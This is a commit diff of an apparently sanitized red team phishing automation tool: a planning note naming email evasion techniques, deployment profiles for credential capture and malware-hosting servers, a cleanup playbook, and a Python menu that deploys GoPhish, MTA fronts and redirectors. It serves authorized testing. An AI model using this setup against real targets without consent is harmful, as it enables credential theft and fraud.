Initial public portfolio release
Sanitized version of red team infrastructure automation platform. Operational content (implant pipelines, lures, credential capture) replaced with documented stubs. Architecture and infrastructure automation code intact.
@@ -0,0 +1,127 @@
|
||||
phishing/
|
||||
├── deploy_phishing_infrastructure.yml *Created
|
||||
├── mta_front.yml *Created
|
||||
├── gophish_server.yml *Created
|
||||
├── phishing_redirector.yml *Created
|
||||
├── phishing_webserver.yml *Created
|
||||
├── payload_redirector.yml
|
||||
├── payload_server.yml
|
||||
└── cleanup_phishing.yml
|
||||
|
||||
tasks/
|
||||
├── configure_mta_front.yml *Created
|
||||
├── configure_gophish_advanced.yml *Created
|
||||
├── configure_phishing_redirector.yml *Created
|
||||
├── configure_phishing_webserver.yml
|
||||
├── configure_payload_redirector.yml
|
||||
├── configure_payload_server.yml
|
||||
└── setup_phishing_security.yml *Created
|
||||
|
||||
templates/
|
||||
├── phishing/
|
||||
│ ├── gophish-advanced-config.j2
|
||||
│ ├── postfix-mta-front.j2
|
||||
│ ├── nginx-phishing-redirector.j2
|
||||
│ ├── nginx-payload-redirector.j2
|
||||
│ ├── phishing-landing-page.j2
|
||||
│ ├── email-templates/
|
||||
│ │ ├── office365_login.j2 *Created
|
||||
│ │ ├── password_expiry.j2
|
||||
│ │ ├── security_alert.j2
|
||||
│ │ └── file_share.j2
|
||||
│ └── fedramp-compliance.j2
|
||||
└── phishing_deployment_state.j2
|
||||
|
||||
I am looking to beef up my phishing portion of my tooland I want to make a stand alone option as well. I will be preforming both red team phishing engagements and fed ramp engagements. So the red team ones need to be more advanced and sophesticated with advanced evasion techniques etc like
|
||||
SMTP smuggling aged domains MTA fronting Cloud service payload hosting CDN exploitation LOtL techniques SPF bypass methods File format manipulation
|
||||
This will require more than one server
|
||||
For fedramp style engagements I am not testing email security controls but only the users and I need to follow the strict guideline
|
||||
The intent is to test user compliance, not email security. Emails should be allow-listed on all security systems and be presented to the user unflagged, unmodified, and unaltered in any way. 3PAOs will provide or approve email templates and landing pages used in testing. 3PAOs must either perform this attack vector themselves, or independently evaluate the effectiveness of a third party phishing campaign. Landing pages for CSP personnel who are victims of the phishing attack should immediately identify that the email was a phish, and provide supplemental information on how to identify phishing attacks in the future. The email campaign will consist of the following:
|
||||
Email with username in body, Link to landing page, Ability to capture emails opened (hidden pixel), Landing page, Ability to tie landing page visits by user, Username and password capture, Ability to track user submission. FedRAMP requires that the 3PAO report back roles and/or metrics but not specific names. Lets keep with making this CSP agnostic as much as possible so AWS and linode can be used and other CSP as they are added to the framework. I would like everything to be as indepentent as possible so its all not running in one huge file or script and can be easily found and worked on and called to build stand alone servers or add to an existing server etc
|
||||
|
||||
For red team engagements I want to be able to deploy my whole red team infra or exactly what I need like just a c2, redirector, payload server, phishing server, Domain fronting server or just payload server, phishing server, Domain fronting server etc. I want an option for red team phishing which deploys
|
||||
|
||||
Below are deployment profiles
|
||||
|
||||
Profile Name: Full Red Team Infra (All the Things)
|
||||
|
||||
Servers:
|
||||
|
||||
MTA Front | SMTP relay hides email backend
|
||||
|
||||
Gophish Email Server | Phishing campaign controller (hidden)
|
||||
|
||||
Phishing Redirector (CDN) | Hides phishing web server behind CDN
|
||||
|
||||
Phishing Web Server | Credential capture backend
|
||||
|
||||
Payload Redirector (CDN) | Hides malware delivery server behind CDN
|
||||
|
||||
Payload Server | Malware hosting backend
|
||||
|
||||
C2 Redirector (CDN) | Hides Havoc/Cobalt backend behind CDN
|
||||
|
||||
C2 Backend | Command & control server (hidden)
|
||||
|
||||
Profile Name: Full Red Team Infra (No CDN Abuse)
|
||||
|
||||
Servers:
|
||||
|
||||
MTA Front | SMTP relay hides email backend
|
||||
|
||||
Gophish Email Server | Phishing campaign controller (hidden)
|
||||
|
||||
Phishing Redirector (VPS) | Nginx/socat hides phishing web server
|
||||
|
||||
Phishing Web Server | Credential capture backend
|
||||
|
||||
Payload Redirector (VPS) | Nginx/socat hides malware delivery server
|
||||
|
||||
Payload Server | Malware hosting backend
|
||||
|
||||
C2 Redirector (VPS) | Nginx/socat hides C2 backend
|
||||
|
||||
C2 Backend | Command & control server (hidden)
|
||||
|
||||
Profile Name: Phishing Infra (Credential Harvesting Only)
|
||||
|
||||
Servers:
|
||||
|
||||
MTA Front (optional) | SMTP relay hides email backend (optional)
|
||||
|
||||
Gophish Email Server | Phishing campaign controller
|
||||
|
||||
Phishing Redirector (CDN or VPS) | Hides phishing web server
|
||||
|
||||
Phishing Web Server | Credential capture backend
|
||||
|
||||
Profile Name: Phishing Infra (Credential Harvesting Only, No CDN)
|
||||
|
||||
Servers:
|
||||
|
||||
MTA Front (optional) | SMTP relay hides email backend (optional)
|
||||
|
||||
Gophish Email Server | Phishing campaign controller
|
||||
|
||||
Phishing Redirector (VPS) | Nginx/socat hides phishing web server
|
||||
|
||||
Phishing Web Server | Credential capture backend
|
||||
|
||||
Profile Name: Whitelisted Phishing Infra (User Awareness Testing)
|
||||
|
||||
Servers:
|
||||
|
||||
Gophish Email Server | Sends phishing campaigns directly
|
||||
|
||||
Phishing Web Server | Fake login or failure landing page
|
||||
|
||||
this needs to also set up firewall rules or security groups to ensure least privilege. I need only the MTA fronting or redirectors accessible to anyone. The main phishing server should only allow the operator to connect and then the main phishing server should be able to access the MTA, Webserver and payload server etc. We need to ensure that things are fully secure. This should be added to the main menu under the phishing server option 9 with sub menus for the different deployment options. This needs to be deployable in any provider so make as much of it provider agnositic. use existing playbooks if it make sense like security hardening etc. I also want this to have the tracker setup as well on any deployment. Make sure to consider the way the tool is built. I want minimal stuff in the deploy.py. As much as possible should be handled with tasks templates and scripts
|
||||
|
||||
|
||||
NOTES:
|
||||
|
||||
- I think I need to remove all the security group stuff to the security_hardening yaml
|
||||
- I dont think I need a tracker on the webserver yaml
|
||||
- setup_phishing_security.yml seems redundant and AWS only focused
|
||||
-
|
||||
-
|
||||
@@ -0,0 +1,59 @@
|
||||
---
|
||||
# Phishing Infrastructure Cleanup Playbook
|
||||
- name: Clean up phishing infrastructure
|
||||
hosts: localhost
|
||||
gather_facts: false
|
||||
connection: local
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
vars:
|
||||
deployment_id: "{{ deployment_id | default('') }}"
|
||||
confirm_cleanup: "{{ confirm_cleanup | default(true) }}"
|
||||
|
||||
tasks:
|
||||
- name: Load deployment state
|
||||
include_vars:
|
||||
file: "phishing_deployment_state_{{ deployment_id }}.json"
|
||||
register: deployment_state
|
||||
ignore_errors: yes
|
||||
|
||||
- name: Show cleanup information
|
||||
debug:
|
||||
msg: |
|
||||
************************************************
|
||||
* PHISHING CLEANUP OPERATION *
|
||||
************************************************
|
||||
The following resources will be DELETED PERMANENTLY:
|
||||
- MTA Front: {{ mta_front_name | default('mta-' + deployment_id) }}
|
||||
- GoPhish Server: {{ gophish_server_name | default('gp-' + deployment_id) }}
|
||||
- Phishing Web Server: {{ phishing_web_name | default('pw-' + deployment_id) }}
|
||||
- Phishing Redirector: {{ phishing_redirector_name | default('phr-' + deployment_id) }}
|
||||
{% if cleanup_payload_infra | default(false) %}
|
||||
- Payload Server: {{ payload_server_name | default('ps-' + deployment_id) }}
|
||||
- Payload Redirector: {{ payload_redirector_name | default('pr-' + deployment_id) }}
|
||||
{% endif %}
|
||||
when: confirm_cleanup | bool
|
||||
|
||||
- name: Confirm cleanup operation
|
||||
pause:
|
||||
prompt: "\n>>> Type 'yes' to confirm deletion or press Ctrl+C to abort <<<"
|
||||
register: confirmation
|
||||
when: confirm_cleanup | bool
|
||||
|
||||
- name: Skip cleanup if not confirmed
|
||||
meta: end_play
|
||||
when: confirm_cleanup | bool and confirmation.user_input != 'yes'
|
||||
|
||||
- name: Run provider-specific cleanup
|
||||
include_tasks: "../{{ provider | upper }}/cleanup.yml"
|
||||
vars:
|
||||
cleanup_redirector: true
|
||||
cleanup_c2: true
|
||||
cleanup_tracker: false
|
||||
redirector_name: "{{ phishing_redirector_name }}"
|
||||
c2_name: "{{ gophish_server_name }}"
|
||||
|
||||
- name: Remove deployment state file
|
||||
file:
|
||||
path: "phishing_deployment_state_{{ deployment_id }}.json"
|
||||
state: absent
|
||||
@@ -0,0 +1,546 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Phishing infrastructure deployment module
|
||||
"""
|
||||
|
||||
import os
|
||||
import sys
|
||||
import logging
|
||||
|
||||
# Add the project root to the path so we can import utils
|
||||
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
|
||||
|
||||
from utils.common import (
|
||||
COLORS, clear_screen, print_banner, generate_deployment_id,
|
||||
setup_logging, get_public_ip, confirm_action, wait_for_input,
|
||||
archive_old_logs
|
||||
)
|
||||
from utils.provider_utils import select_provider, gather_provider_config
|
||||
from utils.ssh_utils import generate_ssh_key
|
||||
from utils.naming_utils import get_deployment_name_with_options
|
||||
|
||||
def gather_phishing_parameters():
|
||||
"""Collect parameters specific to phishing deployments"""
|
||||
clear_screen()
|
||||
print_banner()
|
||||
print(f"{COLORS['WHITE']}PHISHING INFRASTRUCTURE SETUP{COLORS['RESET']}")
|
||||
print(f"{COLORS['WHITE']}=============================={COLORS['RESET']}")
|
||||
|
||||
config = {}
|
||||
|
||||
# Generate deployment ID
|
||||
config['deployment_id'] = generate_deployment_id()
|
||||
print(f"Deployment ID: {COLORS['CYAN']}{config['deployment_id']}{COLORS['RESET']}")
|
||||
|
||||
# Provider selection
|
||||
provider = select_provider()
|
||||
if not provider:
|
||||
return None
|
||||
config['provider'] = provider
|
||||
|
||||
# Get provider-specific configuration
|
||||
provider_config = gather_provider_config(provider)
|
||||
if not provider_config:
|
||||
return None
|
||||
config.update(provider_config)
|
||||
|
||||
# Phishing-specific configuration
|
||||
print(f"\n{COLORS['BLUE']}Phishing Configuration{COLORS['RESET']}")
|
||||
|
||||
# Domain configuration
|
||||
phishing_domain = input(f"Phishing domain (aged domain recommended) [required]: ")
|
||||
if not phishing_domain:
|
||||
print(f"{COLORS['RED']}A domain is required for phishing deployments{COLORS['RESET']}")
|
||||
return None
|
||||
|
||||
# Set all domain variables for compatibility
|
||||
config['phishing_domain'] = phishing_domain
|
||||
config['primary_domain'] = phishing_domain # For compatibility with existing playbooks
|
||||
config['domain'] = phishing_domain # For compatibility
|
||||
|
||||
# Subdomain configuration
|
||||
config['mta_hostname'] = input(f"MTA hostname [default: mail.{phishing_domain}]: ") or f"mail.{phishing_domain}"
|
||||
config['phishing_hostname'] = input(f"Phishing hostname [default: portal.{phishing_domain}]: ") or f"portal.{phishing_domain}"
|
||||
|
||||
# Instance naming
|
||||
print(f"\n{COLORS['BLUE']}Instance Naming{COLORS['RESET']}")
|
||||
|
||||
# MTA Front naming
|
||||
config['mta_name'] = get_deployment_name_with_options(
|
||||
deployment_type='phishing',
|
||||
component_type='MTA Front Server',
|
||||
default_suffix='mta'
|
||||
)
|
||||
|
||||
# GoPhish server naming
|
||||
config['gophish_name'] = get_deployment_name_with_options(
|
||||
deployment_type='phishing',
|
||||
component_type='GoPhish Server',
|
||||
default_suffix='gophish'
|
||||
)
|
||||
|
||||
# Phishing redirector naming
|
||||
config['phishing_redirector_name'] = get_deployment_name_with_options(
|
||||
deployment_type='phishing',
|
||||
component_type='Phishing Redirector',
|
||||
default_suffix='redirector'
|
||||
)
|
||||
|
||||
# Phishing webserver naming
|
||||
config['phishing_webserver_name'] = get_deployment_name_with_options(
|
||||
deployment_type='phishing',
|
||||
component_type='Phishing Webserver',
|
||||
default_suffix='webserver'
|
||||
)
|
||||
|
||||
# MTA Authentication
|
||||
config['smtp_auth_user'] = input("SMTP auth username [default: admin]: ") or "admin"
|
||||
config['smtp_auth_pass'] = input("SMTP auth password [default: random]: ") or None
|
||||
|
||||
# GoPhish configuration
|
||||
config['gophish_admin_port'] = input("GoPhish admin port [default: 8090]: ") or "8090"
|
||||
|
||||
# Campaign configuration
|
||||
config['campaign_name'] = input("Campaign name [default: test-campaign]: ") or "test-campaign"
|
||||
config['sender_name'] = input("Sender display name [default: IT Support]: ") or "IT Support"
|
||||
config['sender_email'] = f"noreply@{config['phishing_domain']}"
|
||||
|
||||
# Template selection
|
||||
print(f"\n{COLORS['BLUE']}Email Template Selection:{COLORS['RESET']}")
|
||||
print(f"1) Office 365 Login")
|
||||
print(f"2) Password Expiration")
|
||||
print(f"3) Security Alert")
|
||||
print(f"4) File Share Notification")
|
||||
print(f"5) Custom Template")
|
||||
|
||||
template_choice = input("Select template [default: 1]: ") or "1"
|
||||
templates = {
|
||||
"1": "office365_login",
|
||||
"2": "password_expiry",
|
||||
"3": "security_alert",
|
||||
"4": "file_share",
|
||||
"5": "custom"
|
||||
}
|
||||
config['email_template'] = templates.get(template_choice, "office365_login")
|
||||
|
||||
# If custom template, get details
|
||||
if config['email_template'] == 'custom':
|
||||
config['custom_template_name'] = input("Custom template name: ")
|
||||
config['custom_subject'] = input("Email subject line: ")
|
||||
config['custom_sender'] = input("Sender email/name: ")
|
||||
|
||||
# Security settings
|
||||
print(f"\n{COLORS['BLUE']}Security Settings:{COLORS['RESET']}")
|
||||
config['enable_credential_harvesting'] = confirm_action("Enable credential harvesting?", default=True)
|
||||
config['enable_attachment_tracking'] = confirm_action("Enable attachment tracking?", default=True)
|
||||
config['enable_link_tracking'] = confirm_action("Enable link click tracking?", default=True)
|
||||
|
||||
# Email for Let's Encrypt
|
||||
default_email = f"admin@{config['phishing_domain']}"
|
||||
config['letsencrypt_email'] = input(f"Email for Let's Encrypt [default: {default_email}]: ") or default_email
|
||||
|
||||
# Get operator IP for security
|
||||
suggested_ip = get_public_ip()
|
||||
if suggested_ip:
|
||||
operator_ip = input(f"Your public IP for admin access [detected: {suggested_ip}]: ") or suggested_ip
|
||||
else:
|
||||
operator_ip = input("Your public IP for admin access: ")
|
||||
config['operator_ip'] = operator_ip
|
||||
|
||||
# SSH key generation
|
||||
ssh_key_path = generate_ssh_key(config['deployment_id'])
|
||||
if not ssh_key_path:
|
||||
print(f"{COLORS['RED']}Failed to generate SSH key{COLORS['RESET']}")
|
||||
return None
|
||||
config['ssh_key_path'] = f"{ssh_key_path}.pub"
|
||||
|
||||
# Post-deployment options
|
||||
config['ssh_after_deploy'] = confirm_action("SSH into instance after deployment?", default=True)
|
||||
config['open_admin_panel'] = confirm_action("Open GoPhish admin panel after deployment?", default=True)
|
||||
|
||||
return config
|
||||
|
||||
def phishing_menu():
|
||||
"""Display the phishing submenu and handle user selection"""
|
||||
while True:
|
||||
clear_screen()
|
||||
print_banner()
|
||||
print(f"{COLORS['WHITE']}PHISHING INFRASTRUCTURE MENU{COLORS['RESET']}")
|
||||
print(f"{COLORS['WHITE']}============================{COLORS['RESET']}")
|
||||
print(f"1) Basic Phishing Setup {COLORS['GREEN']}*RECOMMENDED*{COLORS['RESET']} {COLORS['GRAY']}(MTA + GoPhish){COLORS['RESET']}")
|
||||
print(f"2) GoPhish Server Only {COLORS['GRAY']}(Campaign management only){COLORS['RESET']}")
|
||||
print(f"3) Phishing Web Server Only {COLORS['GRAY']}(Landing pages only){COLORS['RESET']}")
|
||||
print(f"4) MTA Front Server Only {COLORS['GRAY']}(Email sending only){COLORS['RESET']}")
|
||||
print(f"5) Advanced Phishing Setup {COLORS['GRAY']}(MTA + GoPhish + Redirector){COLORS['RESET']}")
|
||||
print(f"6) Phishing Redirector Only {COLORS['GRAY']}(Traffic redirection only){COLORS['RESET']}")
|
||||
print(f"7) Ephemeral MTA Setup {COLORS['GRAY']}(Temporary email infrastructure){COLORS['RESET']}")
|
||||
print(f"8) Full Phishing Infrastructure {COLORS['GRAY']}(Complete multi-tier setup){COLORS['RESET']}")
|
||||
print(f"9) FedRAMP Compliant Phishing {COLORS['GRAY']}(Compliance-focused setup){COLORS['RESET']}")
|
||||
print(f"99) Return to Main Menu")
|
||||
|
||||
choice = input(f"\nSelect an option: ")
|
||||
|
||||
if choice == "1":
|
||||
deploy_basic_phishing()
|
||||
elif choice == "2":
|
||||
deploy_gophish_only()
|
||||
elif choice == "3":
|
||||
deploy_phishing_webserver_only()
|
||||
elif choice == "4":
|
||||
deploy_mta_front_only()
|
||||
elif choice == "5":
|
||||
deploy_advanced_phishing()
|
||||
elif choice == "6":
|
||||
deploy_phishing_redirector_only()
|
||||
elif choice == "7":
|
||||
deploy_ephemeral_mta()
|
||||
elif choice == "8":
|
||||
deploy_full_phishing()
|
||||
elif choice == "9":
|
||||
deploy_fedramp_phishing()
|
||||
elif choice == "99":
|
||||
return
|
||||
else:
|
||||
print(f"\n{COLORS['RED']}Invalid option. Please try again.{COLORS['RESET']}")
|
||||
wait_for_input()
|
||||
|
||||
def deploy_gophish_only():
|
||||
"""Deploy GoPhish server only"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'gophish_only'
|
||||
config['deploy_gophish'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying GoPhish server only...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_mta_front_only():
|
||||
"""Deploy MTA front server only"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'mta_front_only'
|
||||
config['deploy_mta_front'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying MTA front server only...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_phishing_webserver_only():
|
||||
"""Deploy phishing web server only"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'phishing_webserver_only'
|
||||
config['deploy_phishing_webserver'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying phishing web server only...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_phishing_redirector_only():
|
||||
"""Deploy phishing redirector only"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'phishing_redirector_only'
|
||||
config['deploy_phishing_redirector'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying phishing redirector only...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_basic_phishing():
|
||||
"""Deploy basic phishing setup (MTA + GoPhish)"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'basic_phishing'
|
||||
config['deploy_mta_front'] = True
|
||||
config['deploy_gophish'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying basic phishing infrastructure...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_advanced_phishing():
|
||||
"""Deploy advanced phishing setup (MTA + GoPhish + Redirector)"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'advanced_phishing'
|
||||
config['deploy_mta_front'] = True
|
||||
config['deploy_gophish'] = True
|
||||
config['deploy_phishing_redirector'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying advanced phishing infrastructure...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_full_phishing():
|
||||
"""Deploy full phishing infrastructure"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
config['deployment_type'] = 'full_phishing'
|
||||
config['deploy_mta_front'] = True
|
||||
config['deploy_gophish'] = True
|
||||
config['deploy_phishing_redirector'] = True
|
||||
config['deploy_phishing_webserver'] = True
|
||||
config['deploy_tracker'] = True
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying full phishing infrastructure...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_fedramp_phishing():
|
||||
"""Deploy FedRAMP compliant phishing infrastructure"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
# FedRAMP specific configuration
|
||||
clear_screen()
|
||||
print_banner()
|
||||
print(f"{COLORS['WHITE']}FEDRAMP COMPLIANCE CONFIGURATION{COLORS['RESET']}")
|
||||
print(f"{COLORS['WHITE']}==================================={COLORS['RESET']}")
|
||||
|
||||
# Compliance requirements
|
||||
print(f"\n{COLORS['BLUE']}FedRAMP Compliance Requirements:{COLORS['RESET']}")
|
||||
print(f"• Immediate disclosure of phishing attempts")
|
||||
print(f"• Comprehensive audit logging")
|
||||
print(f"• Compliance notification requirements")
|
||||
print(f"• Mandatory log retention")
|
||||
|
||||
# Immediate disclosure (required for FedRAMP)
|
||||
config['immediate_disclosure'] = True
|
||||
print(f"\n{COLORS['YELLOW']}Immediate disclosure is REQUIRED for FedRAMP compliance{COLORS['RESET']}")
|
||||
|
||||
# Authorization reference for documentation
|
||||
auth_reference = input(f"Authorization reference/ticket number [optional]: ") or "Pre-authorized FedRAMP exercise"
|
||||
config['authorization_reference'] = auth_reference
|
||||
|
||||
# Log retention period
|
||||
retention_days = input(f"Log retention period in days [default: 90]: ") or "90"
|
||||
try:
|
||||
config['log_retention_days'] = int(retention_days)
|
||||
except ValueError:
|
||||
config['log_retention_days'] = 90
|
||||
|
||||
# Audit logging level
|
||||
print(f"\n{COLORS['BLUE']}Audit Logging Level:{COLORS['RESET']}")
|
||||
print(f"1) Basic (Login attempts, email sends)")
|
||||
print(f"2) Detailed (+ IP addresses, user agents)")
|
||||
print(f"3) Comprehensive (+ full request logs)")
|
||||
|
||||
log_level = input(f"Select logging level [default: 3]: ") or "3"
|
||||
log_levels = {"1": "basic", "2": "detailed", "3": "comprehensive"}
|
||||
config['audit_log_level'] = log_levels.get(log_level, "comprehensive")
|
||||
|
||||
# Compliance mode settings
|
||||
config['fedramp_mode'] = True
|
||||
config['compliance_mode'] = True
|
||||
config['deployment_type'] = 'fedramp_phishing'
|
||||
config['deploy_gophish'] = True
|
||||
config['deploy_phishing_webserver'] = True
|
||||
config['deploy_tracker'] = True
|
||||
config['enable_audit_logging'] = True
|
||||
|
||||
# Debug options
|
||||
config['debug_mode'] = confirm_action("Enable debug mode (extra verbose Ansible output)?", default=True)
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying FedRAMP compliant phishing infrastructure...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def deploy_ephemeral_mta():
|
||||
"""Deploy ephemeral MTA for high OPSEC phishing"""
|
||||
config = gather_phishing_parameters()
|
||||
if not config:
|
||||
return
|
||||
|
||||
# Additional ephemeral MTA configuration
|
||||
print(f"\n{COLORS['BLUE']}Ephemeral MTA Configuration{COLORS['RESET']}")
|
||||
print(f"{COLORS['YELLOW']}Note: Ephemeral MTAs are designed for short-term use{COLORS['RESET']}")
|
||||
|
||||
config['deployment_type'] = 'ephemeral_mta'
|
||||
config['ephemeral_mta'] = True
|
||||
config['deploy_mta_front'] = True
|
||||
|
||||
# Auto-destruct timer
|
||||
auto_destruct = confirm_action("Enable auto-destruct timer?", default=False)
|
||||
if auto_destruct:
|
||||
hours = input("Auto-destruct after how many hours [default: 24]: ") or "24"
|
||||
config['auto_destruct_hours'] = int(hours)
|
||||
|
||||
print(f"\n{COLORS['GREEN']}Deploying ephemeral MTA...{COLORS['RESET']}")
|
||||
execute_phishing_deployment(config)
|
||||
|
||||
def execute_phishing_deployment(config):
|
||||
"""Execute phishing infrastructure deployment"""
|
||||
clear_screen()
|
||||
print_banner()
|
||||
print(f"\n{COLORS['GREEN']}Starting phishing deployment...{COLORS['RESET']}")
|
||||
|
||||
# Archive old logs before starting new deployment
|
||||
print(f"Archiving old logs...")
|
||||
archive_old_logs(max_logs_to_keep=5) # Keep last 5 deployments
|
||||
|
||||
# Set up logging
|
||||
log_file = setup_logging(config['deployment_id'], "phishing_deployment")
|
||||
|
||||
# Display configuration summary
|
||||
print(f"\n{COLORS['CYAN']}Deployment Summary:{COLORS['RESET']}")
|
||||
print(f"Deployment Type: {config['deployment_type']}")
|
||||
print(f"Deployment ID: {config['deployment_id']}")
|
||||
print(f"Provider: {config['provider']}")
|
||||
print(f"Domain: {config['phishing_domain']}")
|
||||
print(f"Email Template: {config.get('email_template', 'N/A')}")
|
||||
print(f"MTA Hostname: {config.get('mta_hostname', 'N/A')}")
|
||||
if config.get('fedramp_mode'):
|
||||
print(f"FedRAMP Mode: {COLORS['YELLOW']}ENABLED{COLORS['RESET']}")
|
||||
print(f"Authorization Reference: {config.get('authorization_reference', 'N/A')}")
|
||||
print(f"Audit Level: {config.get('audit_log_level', 'N/A')}")
|
||||
|
||||
# Confirm deployment
|
||||
if not confirm_action(f"\n{COLORS['YELLOW']}Proceed with phishing deployment?{COLORS['RESET']}", default=False):
|
||||
print(f"\n{COLORS['YELLOW']}Deployment cancelled.{COLORS['RESET']}")
|
||||
return
|
||||
|
||||
# Mark this as a phishing deployment for the deployment engine
|
||||
config['phishing_deployment'] = True
|
||||
|
||||
# Execute the actual deployment using component-based approach
|
||||
success = execute_component_deployment(config)
|
||||
|
||||
if success:
|
||||
print(f"\n{COLORS['GREEN']}✅ Phishing infrastructure deployed successfully!{COLORS['RESET']}")
|
||||
|
||||
if config.get('ssh_after_deploy'):
|
||||
from utils.ssh_utils import ssh_to_instance
|
||||
ssh_to_instance(config)
|
||||
else:
|
||||
print(f"\n{COLORS['RED']}❌ Phishing infrastructure deployment failed.{COLORS['RESET']}")
|
||||
|
||||
wait_for_input()
|
||||
|
||||
def execute_component_deployment(config):
|
||||
"""Execute component-based phishing deployment"""
|
||||
import subprocess
|
||||
import os
|
||||
|
||||
print(f"\n{COLORS['BLUE']}Executing phishing deployment: {config['deployment_type']}{COLORS['RESET']}")
|
||||
|
||||
# Provider directory mapping
|
||||
provider_dirs = {
|
||||
"aws": "AWS",
|
||||
"linode": "Linode",
|
||||
"flokinet": "FlokiNET"
|
||||
}
|
||||
|
||||
# Component playbook mapping
|
||||
component_playbooks = {
|
||||
'deploy_mta_front': os.path.join(os.path.dirname(__file__), 'mta_front.yml'),
|
||||
'deploy_gophish': os.path.join(os.path.dirname(__file__), '..', '..', 'providers', provider_dirs[config['provider']], 'c2.yml'),
|
||||
'deploy_phishing_redirector': os.path.join(os.path.dirname(__file__), '..', '..', 'providers', provider_dirs[config['provider']], 'redirector.yml'),
|
||||
'deploy_phishing_webserver': os.path.join(os.path.dirname(__file__), 'phishing_webserver.yml'),
|
||||
}
|
||||
|
||||
# Build extra vars for ansible as JSON (safe for special chars)
|
||||
import json as _json
|
||||
import tempfile as _tempfile
|
||||
extra_vars_dict = {}
|
||||
for key, value in config.items():
|
||||
if isinstance(value, (str, int, bool)):
|
||||
extra_vars_dict[key] = value
|
||||
|
||||
deployed_components = []
|
||||
|
||||
try:
|
||||
# Deploy each enabled component
|
||||
for component, playbook_path in component_playbooks.items():
|
||||
if config.get(component, False):
|
||||
print(f"\n{COLORS['YELLOW']}Deploying {component.replace('deploy_', '')}...{COLORS['RESET']}")
|
||||
|
||||
# Check if playbook exists
|
||||
if not os.path.exists(playbook_path):
|
||||
print(f"{COLORS['RED']}Error: Playbook not found: {playbook_path}{COLORS['RESET']}")
|
||||
continue
|
||||
|
||||
# Write vars to temp file (avoids CLI exposure)
|
||||
_vars_file = _tempfile.NamedTemporaryFile(
|
||||
mode='w', suffix='.json', prefix='phish_vars_',
|
||||
delete=False
|
||||
)
|
||||
_json.dump(extra_vars_dict, _vars_file)
|
||||
_vars_file.close()
|
||||
os.chmod(_vars_file.name, 0o600)
|
||||
|
||||
# Build ansible command
|
||||
cmd = [
|
||||
'ansible-playbook',
|
||||
playbook_path,
|
||||
'--extra-vars',
|
||||
f'@{_vars_file.name}'
|
||||
]
|
||||
|
||||
print(f"{COLORS['GRAY']}Running: ansible-playbook {os.path.basename(playbook_path)}{COLORS['RESET']}")
|
||||
|
||||
# Execute playbook
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, cwd=os.path.dirname(__file__))
|
||||
|
||||
# Clean up temp vars file
|
||||
try:
|
||||
os.unlink(_vars_file.name)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
if result.returncode == 0:
|
||||
print(f"{COLORS['GREEN']}✅ {component.replace('deploy_', '')} deployed successfully{COLORS['RESET']}")
|
||||
deployed_components.append(component)
|
||||
else:
|
||||
print(f"{COLORS['RED']}❌ {component.replace('deploy_', '')} deployment failed{COLORS['RESET']}")
|
||||
print(f"{COLORS['RED']}STDERR: {result.stderr}{COLORS['RESET']}")
|
||||
return False
|
||||
|
||||
# Deploy the orchestration playbook to save state
|
||||
print(f"\n{COLORS['YELLOW']}Saving deployment state...{COLORS['RESET']}")
|
||||
orchestration_playbook = os.path.join(os.path.dirname(__file__), 'deploy_phishing_infrastructure.yml')
|
||||
|
||||
_orch_vars_file = _tempfile.NamedTemporaryFile(
|
||||
mode='w', suffix='.json', prefix='phish_orch_',
|
||||
delete=False
|
||||
)
|
||||
_json.dump(extra_vars_dict, _orch_vars_file)
|
||||
_orch_vars_file.close()
|
||||
os.chmod(_orch_vars_file.name, 0o600)
|
||||
|
||||
cmd = [
|
||||
'ansible-playbook',
|
||||
orchestration_playbook,
|
||||
'--extra-vars',
|
||||
f'@{_orch_vars_file.name}'
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True, cwd=os.path.dirname(__file__))
|
||||
|
||||
try:
|
||||
os.unlink(_orch_vars_file.name)
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
if result.returncode == 0:
|
||||
print(f"{COLORS['GREEN']}✅ Deployment state saved{COLORS['RESET']}")
|
||||
return True
|
||||
else:
|
||||
print(f"{COLORS['RED']}❌ Failed to save deployment state{COLORS['RESET']}")
|
||||
print(f"{COLORS['RED']}STDERR: {result.stderr}{COLORS['RESET']}")
|
||||
